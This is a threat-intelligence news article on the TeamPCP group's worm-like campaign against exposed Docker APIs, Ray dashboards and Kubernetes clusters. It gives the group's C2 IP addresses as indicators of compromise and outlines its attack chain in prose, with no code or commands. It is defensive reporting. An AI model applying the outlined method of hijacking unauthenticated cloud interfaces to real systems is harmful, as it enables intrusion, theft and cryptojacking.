A sophisticated cybercriminal collective known as TeamPCP, also operating under monikers like PCPcat and DeadCatx3, has industrialized cloud misconfigurations into a self-propagating cybercrime platform. Emerging in late 2025, the group systematically targets exposed Docker APIs, Kubernetes clusters, and other cloud-native services. Their extensive campaign focuses on building a vast distributed proxy and scanning infrastructure, then exploiting compromised servers for data exfiltration, ransomware deployment, extortion, and cryptocurrency mining.
The intensity of TeamPCP’s activities peaked around Christmas 2025, after which much of their infrastructure became dormant, although members have since celebrated their illicit gains on Telegram. What distinguishes TeamPCP is not necessarily groundbreaking exploit techniques, but rather the sheer scale of their operations and their integrated approach. They leverage well-documented vulnerabilities, transforming exposed cloud infrastructure into a self-sustaining criminal ecosystem. This strategy relies heavily on automation for widespread exploitation.
TeamPCP Industrializes Cloud Misconfigurations Into a Self-Propagating Cybercrime Platform
Researchers at Flare have meticulously tracked TeamPCP’s operations, identifying 185 compromised servers executing attacker-deployed containers. These containers followed standardized command patterns, offering clear insight into the group’s tradecraft. The primary command-and-control (C2) node was located at 67.217.57.240, which was observed on 182 of the compromised hosts. A secondary C2 infrastructure was also identified at 44.252.85.168, appearing on three additional victim servers. The presence of multiple control points suggests a strategy of operational redundancy or early-stage infrastructure migration to mitigate detection.
The majority of the data publicly leaked by TeamPCP originates from organizations in Western countries, with a particular focus on the e-commerce, finance, and human resources sectors. The compromised infrastructure predominantly resides in cloud environments. Azure accounted for 61% of affected servers, while AWS represented 36%, collectively making up 97% of the victimized cloud infrastructure. This dominance highlights the prevalent use of these major cloud providers by the targeted organizations.
Attack Mechanism and Worm-Like Propagation
TeamPCP’s attack methodology begins with automated, large-scale scanning operations across vast IP ranges. The primary objective is to discover openly accessible Docker APIs and Ray dashboards, which serve as initial entry points. Once access is confirmed to these unauthenticated management interfaces, the group proceeds to deploy malicious containers or jobs remotely.
For compromised Docker environments, the attackers pull a lightweight Alpine Linux image and then launch a container configured to run in host network mode with auto-restarting capabilities. This container is designed to fetch and execute remote scripts. In the case of Ray dashboards, TeamPCP submits jobs that execute base64-encoded bootstrap payloads, initiating the infection chain.
The core operational script, identified as proxy.sh, serves as the backbone of the campaign. Upon execution, it installs a suite of proxy utilities, peer-to-peer communication tools, and tunneling capabilities. Crucially, it also deploys additional scanners that continuously probe the internet for other vulnerable servers, thereby facilitating the worm-like propagation of the malware. To ensure persistent control, the script registers multiple system services on the compromised host, effectively transforming each infected server into a self-sustaining node for scanning, relaying traffic, and further C2 operations.
When TeamPCP’s automated tools detect Kubernetes environments, the execution path branches, deploying distinct secondary payloads tailored for these complex cloud-native orchestrators. This indicates that the group possesses specialized tooling for different cloud architectures, demonstrating a nuanced approach to exploiting diverse cloud-native attack surfaces rather than relying on generic Linux malware.
The ongoing evolution of cloud security threats and the sophisticated methods employed by groups like TeamPCP underscore the imperative for organizations to continuously monitor their cloud environments for misconfigurations and unauthorized access. Future activities from this group will likely focus on further scaling their infrastructure and diversifying their exploitation targets within the cloud ecosystem. Security researchers will continue to monitor TeamPCP’s infrastructure for any signs of re-emergence or new campaign launches.